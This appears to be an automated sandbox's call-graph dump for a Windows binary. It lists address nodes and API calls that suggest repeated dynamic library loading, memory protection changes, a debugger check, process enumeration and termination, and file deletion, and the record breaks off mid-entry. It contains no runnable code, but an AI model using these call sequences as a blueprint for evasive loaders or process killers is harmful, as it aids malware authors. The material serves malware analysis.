6459->6460 6461 5b3392 6460->6461 6462 5b340d 6461->6462 6466 5b33d4 6461->6466 6463 5af485 LoadLibraryA 6462->6463 6464 5b344e 6463->6464 6644 5b05e5 6464->6644 6631 5acad5 6466->6631 6468 5b05e5 LoadLibraryA 6469 5b347a 6468->6469 6470 5b05e5 LoadLibraryA 6469->6470 6472 5b348f 6470->6472 6473 5b05e5 LoadLibraryA 6472->6473 6484 5b34a4 6473->6484 6474 5b3587 6494 5b3403 6474->6494 6651 5b2145 6474->6651 6477 5b05e5 LoadLibraryA 6478 5b35bd 6477->6478 6479 5b05e5 LoadLibraryA 6478->6479 6480 5b35d1 6479->6480 6481 5b05e5 LoadLibraryA 6480->6481 6483 5b35e6 6481->6483 6482 5b05e5 LoadLibraryA 6482->6484 6485 5b05e5 LoadLibraryA 6483->6485 6484->6474 6484->6482 6486 5b35fb 6485->6486 6487 5b05e5 LoadLibraryA 6486->6487 6488 5b3633 6487->6488 6489 5b05e5 LoadLibraryA 6488->6489 6490 5b3647 6489->6490 6491 5b05e5 LoadLibraryA 6490->6491 6492 5b365c 6491->6492 6493 5b05e5 LoadLibraryA 6492->6493 6493->6494 6496 5abc65 LoadLibraryA 6495->6496 6497 5b0b58 6496->6497 6498 5abc65 LoadLibraryA 6497->6498 6499 5b0beb 6498->6499 6501 5abc65 LoadLibraryA 6499->6501 6503 5b0cb4 6499->6503 6500 5abc65 LoadLibraryA 6502 5b0d3a 6500->6502 6501->6503 6504 5abc65 LoadLibraryA 6502->6504 6503->6500 6505 5b0e45 6504->6505 6506 5abc65 LoadLibraryA 6505->6506 6507 5b0e5e 6506->6507 6508 5abc65 LoadLibraryA 6507->6508 6509 5b0e77 6508->6509 6510 5abc65 LoadLibraryA 6509->6510 6516 5b0f10 6510->6516 6511 5b1011 6512 5abc65 LoadLibraryA 6511->6512 6513 5b10cc 6512->6513 6514 5abc65 LoadLibraryA 6513->6514 6515 5b10e8 6514->6515 6515->6380 6516->6511 6517 5abc65 LoadLibraryA 6516->6517 6517->6511 6519 5afa1e 6518->6519 6520 5abc65 LoadLibraryA 6519->6520 6521 5afcb2 6520->6521 6522 5abc65 LoadLibraryA 6521->6522 6523 5afcc9 6522->6523 6524 5abc65 LoadLibraryA 6523->6524 6525 5afce3 6524->6525 6526 5abc65 LoadLibraryA 6525->6526 6527 5afcfd 6526->6527 6528 5abc65 LoadLibraryA 6527->6528 6529 5afd17 6528->6529 6530 5abc65 LoadLibraryA 6529->6530 6531 5afe0a 6530->6531 6532 5abc65 LoadLibraryA 6531->6532 6533 5afe23 6532->6533 6534 5abc65 LoadLibraryA 6533->6534 6535 5afe3c 6534->6535 6535->6382 6666 5af3c5 6536->6666 6669 5abe55 6539->6669 6541 5ac3ff 6542 5abe55 LoadLibraryA 6541->6542 6543 5ac40d 6542->6543 6543->6389 6618 5ac445 6543->6618 6545 5b019c 6544->6545 6548 5b0141 6544->6548 6546 5acad5 LoadLibraryA 6545->6546 6547 5b01a1 6546->6547 6549 5abc65 LoadLibraryA 6547->6549 6548->6394 6549->6548 6551 5abc65 LoadLibraryA 6550->6551 6552 5b0326 6551->6552 6553 5abc65 LoadLibraryA 6552->6553 6554 5b033c 6553->6554 6554->6396 6556 5abc65 LoadLibraryA 6555->6556 6557 5b0486 6556->6557 6558 5abc65 LoadLibraryA 6557->6558 6559 5b049f 6558->6559 6560 5abc65 LoadLibraryA 6559->6560 6561 5b04b8 6560->6561 6562 5abc65 LoadLibraryA 6561->6562 6563 5b0529 6562->6563 6563->6399 6565 5b1c18 6564->6565 6567 5b1c1d 6564->6567 6566 5af3c5 LoadLibraryA 6565->6566 6566->6567 6567->6406 6678 5b1c65 6568->6678 6570 5b1cd7 6570->6417 6572 5abc65 LoadLibraryA 6571->6572 6573 5b09e0 6572->6573 6574 5abc65 LoadLibraryA 6573->6574 6575 5b0a53 6574->6575 6575->6431 6577 5abc65 LoadLibraryA 6576->6577 6578 5b11e8 6577->6578 6579 5abc65 LoadLibraryA 6578->6579 6580 5b127b 6579->6580 6581 5b1344 6580->6581 6583 5abc65 LoadLibraryA 6580->6583 6582 5abc65 LoadLibraryA 6581->6582 6584 5b13ca 6582->6584 6583->6581 6585 5abc65 LoadLibraryA 6584->6585 6586 5b14f6 6585->6586 6587 5abc65 LoadLibraryA 6586->6587 6588 5b1512 6587->6588 6589 5abc65 LoadLibraryA 6588->6589 6590 5b152b 6589->6590 6591 5abc65 LoadLibraryA 6590->6591 6592 5b15c4 6591->6592 6598 5abc65 LoadLibraryA 6592->6598 6599 5b16c5 6592->6599 6593 5abc65 LoadLibraryA 6594 5b179b 6593->6594 6595 5abc65 LoadLibraryA 6594->6595 6596 5b17b7 6595->6596 6597 5af485 LoadLibraryA 6596->6597 6600 5b17d1 6597->6600 6598->6599 6599->6593 6601 5abc65 LoadLibraryA 6600->6601 6602 5b1a30 6601->6602 6603 5abc65 LoadLibraryA 6602->6603 6604 5b1a4a 6603->6604 6605 5abc65 LoadLibraryA 6604->6605 6606 5b1a64 6605->6606 6607 5abc65 LoadLibraryA 6606->6607 6608 5b1a7e 6607->6608 6608->6446 6610 5abc65 LoadLibraryA 6609->6610 6611 5ab5f2 6610->6611 6681 5b4045 6611->6681 6615 5ab614 6616 5abc65 LoadLibraryA 6615->6616 6617 5ab65f 6616->6617 6617->6494 6619 5abe55 LoadLibraryA 6618->6619 6620 5ac5cd 6619->6620 6621 5abe55 LoadLibraryA 6620->6621 6622 5ac5db 6621->6622 6623 5abe55 LoadLibraryA 6622->6623 6624 5ac5ec 6623->6624 6625 5abe55 LoadLibraryA 6624->6625 6626 5ac5fa 6625->6626 6627 5abe55 LoadLibraryA 6626->6627 6628 5ac60b 6627->6628 6629 5abe55 LoadLibraryA 6628->6629 6630 5ac61c 6629->6630 6630->6389 6710 5ac7b5 6631->6710 6634 5abc65 LoadLibraryA 6635 5acb82 6634->6635 6636 5abc65 LoadLibraryA 6635->6636 6637 5acc01 6636->6637 6638 5abc65 LoadLibraryA 6637->6638 6639 5acca4 6638->6639 6640 5abc65 LoadLibraryA 6639->6640 6641 5accf7 6640->6641 6642 5abc65 LoadLibraryA 6641->6642 6643 5acdb1 6642->6643 6643->6494 6645 5abc65 LoadLibraryA 6644->6645 6646 5b064d 6645->6646 6647 5abc65 LoadLibraryA 6646->6647 6648 5b0698 6647->6648 6649 5abc65 LoadLibraryA 6648->6649 6650 5b0715 6649->6650 6650->6468 6652 5ac365 LoadLibraryA 6651->6652 6653 5b2151 6652->6653 6654 5b21f5 6653->6654 6655 5abc65 LoadLibraryA 6653->6655 6656 5abc65 LoadLibraryA 6654->6656 6660 5b223d 6654->6660 6655->6654 6657 5b2299 6656->6657 6658 5abc65 LoadLibraryA 6657->6658 6659 5b22d0 6658->6659 6659->6660 6661 5abc65 LoadLibraryA 6659->6661 6660->6477 6662 5b2368 6661->6662 6663 5abc65 LoadLibraryA 6662->6663 6664 5b2409 6663->6664 6719 5b1e95 6664->6719 6667 5abc65 LoadLibraryA 6666->6667 6668 5af452 6667->6668 6668->6386 6670 5abc65 LoadLibraryA 6669->6670 6671 5ac006 6670->6671 6672 5abc65 LoadLibraryA 6671->6672 6677 5ac02f 6671->6677 6673 5ac052 6672->6673 6674 5abc65 LoadLibraryA 6673->6674 6675 5ac069 6674->6675 6676 5abc65 LoadLibraryA 6675->6676 6676->6677 6677->6541 6679 5af3c5 LoadLibraryA 6678->6679 6680 5b1c6e 6679->6680 6680->6570 6690 5b3985 6681->6690 6683 5b404e 6695 5b3ea5 6683->6695 6686 5abc65 LoadLibraryA 6687 5b40f3 6686->6687 6703 5b3bc5 6687->6703 6689 5ab5ff SleepEx 6689->6615 6691 5abc65 LoadLibraryA 6690->6691 6692 5b3a6d 6691->6692 6693 5abc65 LoadLibraryA 6692->6693 6694 5b3ae3 6693->6694 6694->6683 6696 5abc65 LoadLibraryA 6695->6696 6697 5b3fba 6696->6697 6698 5b3fc7 6697->6698 6699 5abc65 LoadLibraryA 6697->6699 6698->6686 6700 5b3fe2 VirtualProtect 6699->6700 6708 5af695 6700->6708 6704 5abc65 LoadLibraryA 6703->6704 6705 5b3ca7 6704->6705 6706 5abc65 LoadLibraryA 6705->6706 6707 5b3cd9 6705->6707 6706->6707 6707->6689 6709 5af6bc VirtualProtect 6708->6709 6709->6698 6711 5abc65 LoadLibraryA 6710->6711 6712 5ac88f 6711->6712 6713 5abc65 LoadLibraryA 6712->6713 6714 5ac9dc 6713->6714 6715 5abc65 LoadLibraryA 6714->6715 6716 5ac9f6 6715->6716 6717 5abc65 LoadLibraryA 6716->6717 6718 5aca49 6717->6718 6718->6634 6718->6643 6720 5abc65 LoadLibraryA 6719->6720 6721 5b1f89 6720->6721 6722 5abc65 LoadLibraryA 6721->6722 6723 5b1fa0 6722->6723 6724 5abc65 LoadLibraryA 6723->6724 6727 5b203f 6724->6727 6725 5b207f 6725->6660 6727->6725 6728 5b1cf5 6727->6728 6729 5abc65 LoadLibraryA 6728->6729 6730 5b1d50 6729->6730 6731 5abc65 LoadLibraryA 6730->6731 6732 5b1d66 6731->6732 6733 5abc65 LoadLibraryA 6732->6733 6734 5b1d7c 6733->6734 6735 5abc65 LoadLibraryA 6734->6735 6736 5b1d92 6735->6736 6736->6727 6988 140004000 6991 1400046c8 6988->6991 6992 1400046e3 __scrt_get_show_window_mode 6991->6992 6993 140004729 GetLastError 6992->6993 6994 140004010 6992->6994 6993->6994 6995 140004741 IsDebuggerPresent 6993->6995 6995->6994 6996 14000474b OutputDebugStringW 6995->6996 6996->6994 6997 140003400 6998 140003427 6997->6998 7001 140003a96 VirtualAlloc 6998->7001 7002 1400035ab 7001->7002 7003 1f0000 7004 1f0009 7003->7004 7005 1f9afd LoadLibraryA 7004->7005 7006 1f9402 7005->7006 7021 1fa37d 7006->7021 7011 1f9afd LoadLibraryA 7012 1f9645 7011->7012 7013 1f9afd LoadLibraryA 7012->7013 7014 1f965c 7013->7014 7015 1f9afd LoadLibraryA 7014->7015 7016 1f9673 7015->7016 7017 1f9afd LoadLibraryA 7016->7017 7019 1f9749 7017->7019 7018 1f979b 7019->7018 7043 1f938d 7019->7043 7060 1fa05d 7021->7060 7024 1f9afd LoadLibraryA 7025 1fa42a 7024->7025 7026 1f9afd LoadLibraryA 7025->7026 7027 1fa4a9 7026->7027 7028 1f9afd LoadLibraryA 7027->7028 7029 1fa54c 7028->7029 7030 1f9afd LoadLibraryA 7029->7030 7031 1fa59f 7030->7031 7032 1f9afd LoadLibraryA 7031->7032 7033 1f940f 7032->7033 7034 1f9b9d 7033->7034 7035 1f9afd LoadLibraryA 7034->7035 7036 1f9d10 7035->7036 7037 1f9afd LoadLibraryA 7036->7037 7038 1f9d27 7037->7038 7039 1f9afd LoadLibraryA 7038->7039 7040 1f9d3e 7039->7040 7041 1f941a 7040->7041 7042 1f9e2d 3 API calls 7040->7042 7041->7011 7042->7041 7044 1f9afd LoadLibraryA 7043->7044 7045 1f9402 7044->7045 7046 1fa37d LoadLibraryA 7045->7046 7047 1f940f 7046->7047 7048 1f9b9d 3 API calls 7047->7048 7049 1f941a 7048->7049 7050 1f9afd LoadLibraryA 7049->7050 7051 1f9645 7050->7051 7052 1f9afd LoadLibraryA 7051->7052 7053 1f965c 7052->7053 7054 1f9afd LoadLibraryA 7053->7054 7055 1f9673 7054->7055 7056 1f9afd LoadLibraryA 7055->7056 7057 1f9749 7056->7057 7058 1f979b 7057->7058 7059 1f938d 3 API calls 7057->7059 7058->7018 7059->7058 7061 1f9afd LoadLibraryA 7060->7061 7062 1fa137 7061->7062 7063 1f9afd LoadLibraryA 7062->7063 7064 1fa284 7063->7064 7065 1f9afd LoadLibraryA 7064->7065 7066 1fa29e 7065->7066 7067 1f9afd LoadLibraryA 7066->7067 7068 1fa2f1 7067->7068 7068->7024 7068->7033 8018 5ae745 8019 5abc65 LoadLibraryA 8018->8019 8020 5aeb3c 8019->8020 8021 5abc65 LoadLibraryA 8020->8021 8022 5aeb56 8021->8022 8023 5abc65 LoadLibraryA 8022->8023 8024 5aeb70 8023->8024 8025 5abc65 LoadLibraryA 8024->8025 8026 5aeb8a 8025->8026 8027 5abc65 LoadLibraryA 8026->8027 8028 5aeba1 8027->8028 8029 5abc65 LoadLibraryA 8028->8029 8030 5aebb8 8029->8030 8031 5abc65 LoadLibraryA 8030->8031 8032 5aec3a 8031->8032 8033 140004f04 8036 1400052e4 8033->8036 8037 140005307 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8036->8037 8038 14000537b 8036->8038 8037->8038 7069 14000ae08 7070 14000ae30 7069->7070 7078 14000ae29 7069->7078 7071 14000ae37 7070->7071 7072 14000ae69 7070->7072 7073 14000a888 pre_c_initialization 15 API calls 7071->7073 7072->7078 7080 14000856c 7072->7080 7075 14000ae42 7073->7075 7077 14000a08c __free_lconv_num 15 API calls 7075->7077 7076 14000ae94 7079 14000a08c __free_lconv_num 15 API calls 7076->7079 7077->7078 7079->7078 7081 140008574 7080->7081 7082 1400085b3 7081->7082 7083 1400085a4 7081->7083 7084 1400085bd 7082->7084 7089 14000a0cc 7082->7089 7085 140008544 _set_fmode 15 API calls 7083->7085 7096 14000a108 7084->7096 7088 1400085a9 __scrt_get_show_window_mode 7085->7088 7088->7076 7090 14000a0d5 7089->7090 7091 14000a0ee HeapSize 7089->7091 7092 140008544 _set_fmode 15 API calls 7090->7092 7093 14000a0da 7092->7093 7094 140008424 _invalid_parameter_noinfo 32 API calls 7093->7094 7095 14000a0e5 7094->7095 7095->7084 7097 14000a127 7096->7097 7098 14000a11d 7096->7098 7100 14000a12c 7097->7100 7103 14000a133 pre_c_initialization 7097->7103 7108 14000a244 7098->7108 7101 14000a08c __free_lconv_num 15 API calls 7100->7101 7105 14000a125 7101->7105 7102 14000a172 7104 140008544 _set_fmode 15 API calls 7102->7104 7103->7102 7106 14000a15c HeapReAlloc 7103->7106 7107 140008614 pre_c_initialization 2 API calls 7103->7107 7104->7105 7105->7088 7106->7103 7106->7105 7107->7103 7109 14000a28f 7108->7109 7113 14000a253 pre_c_initialization 7108->7113 7110 140008544 _set_fmode 15 API calls 7109->7110 7112 14000a28d 7110->7112 7111 14000a276 HeapAlloc 7111->7112 7111->7113 7112->7105 7113->7109 7113->7111 7114 140008614 pre_c_initialization 2 API calls 7113->7114 7114->7113 7115 14000f60c 7116 14000f621 CloseHandle 7115->7116 7117 14000f627 7115->7117 7116->7117 7425 14000ba8c GetProcessHeap 8272 14000a18c 8273 14000a194 8272->8273 8274 14000a5b4 6 API calls 8273->8274 8275 14000a1c5 8273->8275 8277 14000a1c1 8273->8277 8274->8273 8278 14000a1f0 8275->8278 8279 14000a21b 8278->8279 8280 14000a1fe DeleteCriticalSection 8279->8280 8281 14000a21f 8279->8281 8280->8279 8281->8277 8282 14000ff8e 8283 1400065c4 _CallSETranslator 45 API calls 8282->8283 8284 14000ffa5 8283->8284 8285 1400065c4 _CallSETranslator 45 API calls 8284->8285 8286 14000ffbc 8285->8286 8287 140007398 __InternalCxxFrameHandler 51 API calls 8286->8287 8288 140010001 8287->8288 8289 1400065c4 _CallSETranslator 45 API calls 8288->8289 8290 140010006 8289->8290 7118 14000d010 7119 14000d03a 7118->7119 7120 14000a888 pre_c_initialization 15 API calls 7119->7120 7121 14000d059 7120->7121 7122 14000a08c __free_lconv_num 15 API calls 7121->7122 7123 14000d067 7122->7123 7124 14000a888 pre_c_initialization 15 API calls 7123->7124 7127 14000d091 7123->7127 7126 14000d083 7124->7126 7128 14000a08c __free_lconv_num 15 API calls 7126->7128 7129 14000d09a 7127->7129 7130 14000a5b4 7127->7130 7128->7127 7131 14000a2a4 __vcrt_uninitialize_ptd 5 API calls 7130->7131 7132 14000a5ef 7131->7132 7133 14000a60c InitializeCriticalSectionAndSpinCount 7132->7133 7134 14000a5f7 7132->7134 7133->7134 7134->7127 8039 5ad175 8044 5ace95 8039->8044 8041 5ad18c 8042 5abc65 LoadLibraryA 8041->8042 8043 5ad24e 8041->8043 8042->8043 8045 5abe55 LoadLibraryA 8044->8045 8046 5ad0c1 8045->8046 8047 5abe55 LoadLibraryA 8046->8047 8048 5ad0d2 8047->8048 8049 5abe55 LoadLibraryA 8048->8049 8050 5ad0e3 8049->8050 8051 5abe55 LoadLibraryA 8050->8051 8052 5ad0f4 8051->8052 8053 5abe55 LoadLibraryA 8052->8053 8054 5ad105 8053->8054 8054->8041 8291 5aedf5 8292 5abc65 LoadLibraryA 8291->8292 8293 5af13e 8292->8293 8294 5abc65 LoadLibraryA 8293->8294 8295 5af155 8294->8295 8296 5abc65 LoadLibraryA 8295->8296 8297 5af16c 8296->8297 8298 5abc65 LoadLibraryA 8297->8298 8299 5af186 8298->8299 8300 5abc65 LoadLibraryA 8299->8300 8301 5af1a0 8300->8301 8302 5abc65 LoadLibraryA 8301->8302 8303 5af1b7 8302->8303 8305 5af224 8303->8305 8306 5ae395 8303->8306 8307 5abc65 LoadLibraryA 8306->8307 8308 5ae61d 8307->8308 8309 5abc65 LoadLibraryA 8308->8309 8310 5ae634 8309->8310 8311 5abc65 LoadLibraryA 8310->8311 8312 5ae64b 8311->8312 8313 5abc65 LoadLibraryA 8312->8313 8314 5ae662 8313->8314 8315 5abc65 LoadLibraryA 8314->8315 8316 5ae679 8315->8316 8316->8305 8317 140004d90 8337 140004a08 8317->8337 8320 140004edc 8322 140004f24 __scrt_fastfail 7 API calls 8320->8322 8321 140004dac __scrt_acquire_startup_lock 8323 140004ee6 8321->8323 8330 140004dca __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 8321->8330 8322->8323 8324 140004f24 __scrt_fastfail 7 API calls 8323->8324 8326 140004ef1 abort 8324->8326 8325 140004def 8327 140004e75 8348 140005070 8327->8348 8329 140004e7a 8351 140004580 GetCommandLineW 8329->8351 8330->8325 8330->8327 8343 140008a84 8330->8343 8338 140004a2a __scrt_initialize_crt 8337->8338 8373 14000631c 8338->8373 8340 140004a33 8340->8320 8340->8321 8341 140004a2f __scrt_initialize_crt 8341->8340 8381 140006350 8341->8381 8344 140008ac2 8343->8344 8345 140008ab0 8343->8345 8346 14000994c __InternalCxxFrameHandler 36 API calls 8344->8346 8345->8327 8347 140008ac7 8346->8347 8427 140005900 8348->8427 8350 140005087 GetStartupInfoW 8350->8329 8352 1400045c2 8351->8352 8354 1400045d7 8352->8354 8355 1400045ae lstrcmpiW 8352->8355 8429 140004020 8352->8429 8356 1400046b5 ExitProcess 8354->8356 8355->8352 8357 1400045dc 8355->8357 8435 1400043d0 8357->8435 8362 140004601 ExitProcess 8363 14000460b LoadLibraryW 8364 140004628 GetProcAddress 8363->8364 8365 14000461e ExitProcess 8363->8365 8366 14000467e GetMessageW 8364->8366 8367 140004640 ExitProcess 8364->8367 8368 140004695 8366->8368 8369 14000464a 8366->8369 8371 1400046a2 ExitProcess 8368->8371 8372 1400046ac FreeLibrary 8368->8372 8369->8366 8370 140004673 DispatchMessageW 8369->8370 8370->8366 8372->8356 8374 140006325 __vcrt_initialize_winapi_thunks __vcrt_initialize 8373->8374 8389 140007c7c 8374->8389 8380 140006333 8380->8341 8382 140006358 8381->8382 8383 140006369 8381->8383 8415 140006700 8382->8415 8383->8340 8386 140007cc4 __vcrt_uninitialize_locks DeleteCriticalSection 8387 140006362 8386->8387 8419 140008094 8387->8419 8390 140007c84 8389->8390 8392 140007cb5 8390->8392 8393 14000632f 8390->8393 8406 140008000 8390->8406 8394 140007cc4 __vcrt_uninitialize_locks DeleteCriticalSection 8392->8394 8393->8380 8395 1400066ac 8393->8395 8394->8393 8411 140007ed4 8395->8411 8407 140007cfc try_get_function 5 API calls 8406->8407 8408 140008036 8407->8408 8409 14000804b InitializeCriticalSectionAndSpinCount 8408->8409 8410 140008040 8408->8410 8409->8410 8410->8390 8412 140007cfc try_get_function 5 API calls 8411->8412 8413 140007ef9 TlsAlloc 8412->8413 8416 14000670f 8415->8416 8418 14000635d 8415->8418 8423 140007f1c 8416->8423 8418->8386 8420 1400080cc 8419->8420 8422 140008098 8419->8422 8420->8383 8421 1400080b2 FreeLibrary 8421->8422 8422->8420 8422->8421 8424 140007cfc try_get_function 5 API calls 8423->8424 8425 140007f43 TlsFree 8424->8425 8428 1400058e0 8427->8428 8428->8350 8428->8428 8432 14000403a 8429->8432 8430 140004080 8430->8352 8431 140004064 CharNextW 8431->8432 8432->8430 8432->8431 8433 140004075 CharNextW 8432->8433 8434 140004056 CharNextW 8432->8434 8433->8430 8434->8431 8434->8432 8436 1400043f0 CreateToolhelp32Snapshot 8435->8436 8437 140004564 lstrcpyW 8436->8437 8438 140004408 Process32FirstW 8436->8438 8455 140004094 GetModuleFileNameW 8437->8455 8439 140004426 StrCmpIW 8438->8439 8440 14000455b CloseHandle 8438->8440 8441 14000444c Process32NextW 8439->8441 8442 14000443c GetCurrentProcessId 8439->8442 8440->8437 8441->8439 8444 14000445e CloseHandle 8441->8444 8442->8441 8443 1400044e2 CloseHandle CreateToolhelp32Snapshot 8442->8443 8445 140004508 Thread32First 8443->8445 8446 140004469 8443->8446 8444->8446 8445->8446 8446->8436 8446->8437 8447 140004471 OpenProcess 8446->8447 8448 140004522 CloseHandle 8446->8448 8450 140004537 PostThreadMessageW 8446->8450 8451 14000454b Thread32Next 8446->8451 8447->8446 8449 140004489 WaitForSingleObject 8447->8449 8448->8446 8452 1400044c9 CloseHandle 8449->8452 8453 14000449e CloseHandle OpenProcess 8449->8453 8450->8451 8451->8446 8452->8446 8453->8452 8454 1400044bd TerminateProcess 8453->8454 8454->8452 8456 1400040fe StrCpyW PathAppendW StrCatW FindFirstFileW 8455->8456 8457 1400040de 8455->8457 8458 140004161 StrCpyW PathAppendW LoadLibraryW 8456->8458 8470 14000415a 8456->8470 8457->8456 8459 1400042df FindNextFileW 8458->8459 8460 1400041af GetProcAddress GetProcAddress GetProcAddress 8458->8460 8459->8458 8461 1400042fa FindClose FindFirstFileW 8459->8461 8468 1400041fc 8460->8468 8462 140004324 StrCmpIW 8461->8462 8461->8470 8465 140004367 FindNextFileW 8462->8465 8466 140004338 StrCpyW PathAppendW DeleteFileW 8462->8466 8463 140004297 FreeLibrary 8463->8459 8463->8468 8464 14000420a GetProcessHeap HeapAlloc 8464->8468 8465->8462 8467 14000437b FindClose StrCpyW StrCpyW PathAppendW 8465->8467 8466->8465 8467->8470 8468->8459 8468->8463 8468->8464 8469 14000427e GetProcessHeap HeapFree 8468->8469 8468->8470 8469->8463 8470->8362 8470->8363 8055 14000a914 8056 14000a94a 8055->8056 8066 14000a960 8055->8066 8057 140008544 _set_fmode 15 API calls 8056->8057 8058 14000a94f 8057->8058 8060 140008424 _invalid_parameter_noinfo 32 API calls 8058->8060 8059 14000a9cc 8062 140008c6c pre_c_initialization 15 API calls 8059->8062 8061 14000a959 8060->8061 8063 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 8061->8063 8069 14000aa40 8062->8069 8067 14000ab13 8063->8067 8064 14000aaba 8068 14000a08c __free_lconv_num 15 API calls 8064->8068 8066->8059 8074 14000a9bf 8066->8074 8078 14000ab44 8066->8078 8068->8074 8069->8064 8075 14000ab2e 8069->8075 8089 14000c130 8069->8089 8070 14000aafc 8072 14000a08c __free_lconv_num 15 API calls 8070->8072 8071 14000a08c __free_lconv_num 15 API calls 8071->8074 8072->8061 8074->8070 8074->8071 8076 140008444 _invalid_parameter_noinfo 17 API calls 8075->8076 8077 14000ab42 8076->8077 8079 14000ab76 8078->8079 8079->8079 8080 14000a888 pre_c_initialization 15 API calls 8079->8080 8081 14000abc1 8080->8081 8082 14000c130 32 API calls 8081->8082 8083 14000abf3 8082->8083 8084 140008444 _invalid_parameter_noinfo 17 API calls 8083->8084 8085 14000ac55 __scrt_get_show_window_mode 8084->8085 8086 14000ad12 FindFirstFileExW 8085->8086 8087 14000ad81 8086->8087 8088 14000ab44 32 API calls 8087->8088 8094 14000c145 8089->8094 8090 14000c14a 8091 14000c160 8090->8091 8092 140008544 _set_fmode 15 API calls 8090->8092 8091->8069 8093 14000c154 8092->8093 8095 140008424 _invalid_parameter_noinfo 32 API calls 8093->8095 8094->8090 8094->8091 8096 14000c191 8094->8096 8095->8091 8096->8091 8097 140008544 _set_fmode 15 API calls 8096->8097 8097->8093 6352 140003a96 VirtualAlloc 6353 140003acd 6352->6353 7426 14000da98 7429 14000b5d4 7426->7429 7430 14000b5e1 7429->7430 7432 14000b5ed 7429->7432 7433 14000b41c 7430->7433 7434 140009ef8 pre_c_initialization 36 API calls 7433->7434 7435 14000b435 7434->7435 7436 14000b5fc 36 API calls 7435->7436 7437 14000b43e 7436->7437 7453 14000b128 7437->7453 7440 14000b458 7440->7432 7441 14000a244 _onexit 16 API calls 7444 14000b469 7441->7444 7442 14000b504 7443 14000a08c __free_lconv_num 15 API calls 7442->7443 7443->7440 7444->7442 7460 14000b6bc 7444->7460 7447 14000b4ff 7448 140008544 _set_fmode 15 API calls 7447->7448 7448->7442 7449 14000b561 7449->7442 7470 14000aed8 7449->7470 7450 14000b524 7450->7449 7451 14000a08c __free_lconv_num 15 API calls 7450->7451 7451->7449 7454 140009a60 36 API calls 7453->7454 7455 14000b13c 7454->7455 7456 14000b148 GetOEMCP 7455->7456 7457 14000b15a 7455->7457 7458 14000b16f 7456->7458 7457->7458 7459 14000b15f GetACP 7457->7459 7458->7440 7458->7441 7459->7458 7461 14000b128 38 API calls 7460->7461 7462 14000b6e9 7461->7462 7463 14000b6f1 7462->7463 7464 14000b733 IsValidCodePage 7462->7464 7467 14000b759 __scrt_get_show_window_mode 7462->7467 7466 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 7463->7466 7464->7463 7465 14000b744 GetCPInfo 7464->7465 7465->7463 7465->7467 7468 14000b4f8 7466->7468 7477 14000b238 GetCPInfo 7467->7477 7468->7447 7468->7450 7542 14000a1d4 EnterCriticalSection 7470->7542 7483 14000b281 7477->7483 7486 14000b361 7477->7486 7480 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 7482 14000b405 7480->7482 7482->7463 7487 14000c870 7483->7487 7485 14000da00 41 API calls 7485->7486 7486->7480 7488 140009a60 36 API calls 7487->7488 7489 14000c8b2 MultiByteToWideChar 7488->7489 7491 14000c8f7 7489->7491 7492 14000c8f0 7489->7492 7494 14000c925 __scrt_get_show_window_mode 7491->7494 7495 14000a244 _onexit 16 API calls 7491->7495 7493 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 7492->7493 7496 14000b2f5 7493->7496 7497 14000c995 MultiByteToWideChar 7494->7497 7499 14000c9d0 7494->7499 7495->7494 7501 14000da00 7496->7501 7498 14000c9b6 GetStringTypeW 7497->7498 7497->7499 7498->7499 7499->7492 7500 14000a08c __free_lconv_num 15 API calls 7499->7500 7500->7492 7502 140009a60 36 API calls 7501->7502 7503 14000da25 7502->7503 7506 14000d6a4 7503->7506 7507 14000d6e6 7506->7507 7508 14000d70a MultiByteToWideChar 7507->7508 7509 14000d9b5 7508->7509 7510 14000d73c 7508->7510 7511 14000fb50 __FrameHandler3::UnwindNestedFrames 8 API calls 7509->7511 7513 14000a244 _onexit 16 API calls 7510->7513 7516 14000d774 7510->7516 7512 14000b328 7511->7512 7512->7485 7513->7516 7514 14000d7d8 MultiByteToWideChar 7515 14000d7fe 7514->7515 7518 14000d889 7514->7518 7533 14000a62c 7515->7533 7516->7514 7516->7518 7518->7509 7520 14000a08c __free_lconv_num 15 API calls 7518->7520 7520->7509 7521 14000d846 7521->7518 7523 14000a62c 6 API calls 7521->7523 7522 14000d898 7524 14000a244 _onexit 16 API calls 7522->7524 7527 14000d8c3 7522->7527 7523->7518 7524->7527 7525 14000a62c 6 API calls 7526 14000d956 7525->7526 7528 14000d98c 7526->7528 7529 14000d980 WideCharToMultiByte 7526->7529 7527->7518 7527->7525 7528->7518 7530 14000a08c __free_lconv_num 15 API calls 7528->7530 7529->7528 7531 14000d9ec 7529->7531 7530->7518 7531->7518 7532 14000a08c __free_lconv_num 15 API calls 7531->7532 7532->7518 7534 14000a2a4 __vcrt_uninitialize_ptd 5 API calls 7533->7534 7535 14000a66f 7534->7535 7536 14000a677 7535->7536 7539 14000a71c 7535->7539 7536->7518 7536->7521 7536->7522 7538 14000a6d8 LCMapStringW 7538->7536 7540 14000a2a4 __vcrt_uninitialize_ptd 5 API calls 7539->7540 7541 14000a74f 7540->7541 7541->7538 7543 14000bc9c 7554 14000a1d4 EnterCriticalSection 7543->7554 7555 14000629c 7556 1400065c4 _CallSETranslator 45 API calls 7555->7556 7557 1400062be 7556->7557 7558 1400065c4 _CallSETranslator 45 API calls 7557->7558 7559 1400062cb 7558->7559 7560 1400065c4 _CallSETranslator 45 API calls 7559->7560 7561 1400062d8 7560->7561 7564 140007398 7561->7564 7563 140006309 7565 1400073c5 __except_validate_context_record 7564->7565 7566 1400065c4 _CallSETranslator 45 API calls 7565->7566 7567 1400073ca 7566->7567 7569 1400074b7 7567->7569 7572 140007428 7567->7572 7582 14000747d 7567->7582 7568 14000752a 7568->7582 7628 140006bc0 7568->7628 7574 1400074d6 7569->7574 7622 140006244 7569->7622 7571 1400074a4 7613 140005e04 7571->7613 7572->7571 7576 140007482 7572->7576 7577 14000744b 7572->7577 7572->7582 7574->7568 7574->7582 7625 140006258 7574->7625 7576->7571 7579 14000745a 7576->7579 7589 1400067c8 7577->7589 7580 1400075d8 7579->7580 7584 14000746c 7579->7584 7583 14000994c __InternalCxxFrameHandler 36 API calls 7580->7583 7582->7563 7585 1400075dd 7583->7585 7594 1400078c8 7584->7594 7678 140005a90 7585->7678 7588 14000760c 7588->7563 7590 1400067d6 7589->7590 7591 14000994c __InternalCxxFrameHandler 36 API calls 7590->7591 7593 1400067e7 7590->7593 7592 